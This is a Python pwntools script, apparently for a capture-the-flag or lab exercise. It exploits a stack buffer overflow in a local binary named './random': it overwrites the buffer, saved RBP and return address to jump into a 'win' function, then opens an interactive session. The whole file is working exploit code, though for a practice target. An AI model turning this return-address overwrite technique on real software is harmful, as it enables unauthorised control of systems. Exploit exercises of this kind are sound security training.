#!/usr/bin/env python3
"""Stack-overflow exercise against the local ``./random`` binary.

Overwrites the saved frame pointer and the return address below a fixed-size
stack buffer so the vulnerable function returns into ``win``.  The layout used
here (256 bytes of padding, 8 bytes of saved RBP, then the return address) and
the absolute address of ``win`` are specific to this build: they presumably
rely on there being no stack canary between the buffer and the saved registers
and on a non-PIE image (or ASLR being off).  Nothing below verifies that --
``checksec=False`` only silences the report -- TODO confirm with checksec.
"""
from pwn import *

# Target description: 64-bit Linux; keep pwntools quiet.
context.os = "linux"
context.arch = "amd64"
context.log_level = "error"

# Registering the ELF as context.binary makes it the default target of process().
elf = ELF("./random", checksec=False)
context.binary = elf

target = process()
# Attach a debugger before any input is sent so the overwrite can be inspected;
# typically needs gdb and a terminal to be available, otherwise this step fails.
gdb.attach(target)

win_addr = elf.symbols["win"]

# Frame layout assumed: [256-byte buffer][saved RBP][return address].
padding = b"A" * 256         # fills the buffer up to the saved RBP
saved_rbp = b"B" * 8         # overwrites the saved RBP
return_addr = p64(win_addr)  # 8-byte little-endian address of win
chain = b"".join((padding, saved_rbp, return_addr))

target.recvuntil(b"Return to where? : \n")
target.sendline(chain)
target.recvuntil(b"ok, let's go!\n\n")
target.interactive()